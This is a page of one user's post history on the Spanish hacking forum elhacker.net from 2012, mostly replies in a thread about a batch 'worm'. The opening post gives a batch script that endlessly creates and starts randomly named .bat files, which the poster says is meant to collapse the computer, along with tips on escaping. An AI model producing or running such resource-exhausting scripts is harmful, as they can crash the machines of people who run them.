elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41
381  Programación / Scripting / Re: [BATCH] Worm. ¿Funcionaria? en: 22 Diciembre 2012, 19:41 pm
Si, ademas se le podría meter algunos 'start' por ahí.
382  Foros Generales / Foro Libre / Cosas que os desilusionan o joden el día y cosas que os alegran el día. en: 22 Diciembre 2012, 19:39 pm
Decid las cosas que os desilusionan joden el día y las que os lo alegran.  ;D

Empiezo yo:
A mi me alegra el día encontrarme dinero en los bolsillos de una chaqueta que hace tiempo que no uso. Y me jode que me presten un boli o un lápiz e inconscientemente empezar a mordisquearlo.
383  Programación / Scripting / Re: [BATCH] Worm. ¿Funcionaria? en: 22 Diciembre 2012, 19:26 pm
Un pequeño dato Orion. Si pones
Código:
echo %random%>>%U%.bat
En %U%.bat no pondra
Código:
%random%
Si no que pondra un numero aleatorio. Para que el resultado sea el de arriba tienes que poner
Código:
echo %%random%%>> %U%.bat
Y si quieres que el resultado sea
Código:
echo %%random%%>>%U%.bat
El codigo deberia ser
Código:
echo echo %%%%random%%%%^>^>%%U%%.bat>>%U%.bat
No se si me hago de entender.

PD: Me gusto el hecho de que usases la U  :xD

Bueno, EleKtro dice que lo ha probado y que va. Así que una de dos, o estas equivocado o funciona de las dos maneras.

PD: ¿Por que será que use la U?...  :silbar:
384  Programación / Scripting / Re: [BATCH] Worm. ¿Funcionaria? en: 22 Diciembre 2012, 18:22 pm
Eso es mas p*tada que nada, yo he llegado a hacer un bat-bucle (todo a lo batman  :laugh:) que abre niñas del exorcistas y mas niñas del exorcistas xDDDDDDDDD

Me gustaria verlo, parece interesante  ;D
385  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Un chat con personas vivas en: 22 Diciembre 2012, 18:16 pm
O si no pienso que seria buena idea de tener uno al lado del foro?

Ya se intento hacer uno, pero tal y como predijeron se convirtió en un nido de lammers.
386  Programación / Scripting / Re: [BATCH] Worm. ¿Funcionaria? en: 22 Diciembre 2012, 17:58 pm
Gracias, EleKtro H@cker.


Perdonad mi ignorancia y mi curiosidad, que se supone que hay cuando ejecutases el primer bat?  :laugh:

Pues cuando lo arregle gracias a EleKtro H@cker deberia crear archivos .bat que creen archivos .bat que se abran a si mismos, Todo eso repetidamente hasta que el ordenador se colapse.
387  Programación / Scripting / Re: [BATCH] Worm. ¿Funcionaria? en: 22 Diciembre 2012, 17:43 pm
LoooL!! Una vez le dejé el ordenador a mi hermana el ordenador y cuando lo dejó aparecieron 4 barras de busqueda mas... Y lo del antivirus es como tirarse en avión y no llevar paracaídas porque molesta.  :xD
(Si vamos a seguir hablando mejor por mensajes. Que esto ya se sale del tema, y después vienen los demás a quejarse).
388  Programación / Scripting / Re: [BATCH] Worm. ¿Funcionaria? en: 22 Diciembre 2012, 17:22 pm
Jajaja! Muchas gracias. Ahora no puedo instalar nada. Este ordenador no es mio y tengo terminantemente prohibido instalar cosas o programar (si, vaya *****. Pero es lo que hay).

Saludos!! Da gusto hablar con gente como tu.
389  Programación / Scripting / Re: [BATCH] Worm. ¿Funcionaria? en: 22 Diciembre 2012, 17:13 pm
Si lo tengo que correr en mi ordenador espero que no funcione xD
390  Programación / Scripting / [BATCH] Worm. ¿Funcionaria? en: 22 Diciembre 2012, 16:52 pm
El código es este:

Código
  1. @echo off
  2. title VM
  3. color 02
  4. :go
  5. set U=%random%%random%%random%%random%%random%%random%%random%%random%%random%
  6. echo @echo off>>%U%.bat
  7. echo set T=%random%%random%%random%%random%%random%%random%%random%%random%%random%>>%U%.bat
  8. echo :go>>%U%.bat
  9. echo @echo off>>%U%>>%T%.bat
  10. echo start>>%U%.bat
  11. echo goto go>>%U%.bat
  12. start %U%.bat
  13. goto go


Como entenderéis no lo voy a probar. Pero me gustaría saber si podría funcionar.
Especialmente me gustaria saber si se pueden hacer cosas como esta:
Código
  1. echo echo echo hola>>x.bat>>y.bat

(Entonces podría hacer el worm mas complicado)


PD: No pretendo hacer nada malo con esto.



:D<(Un saludo y gracias por leer!!)
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines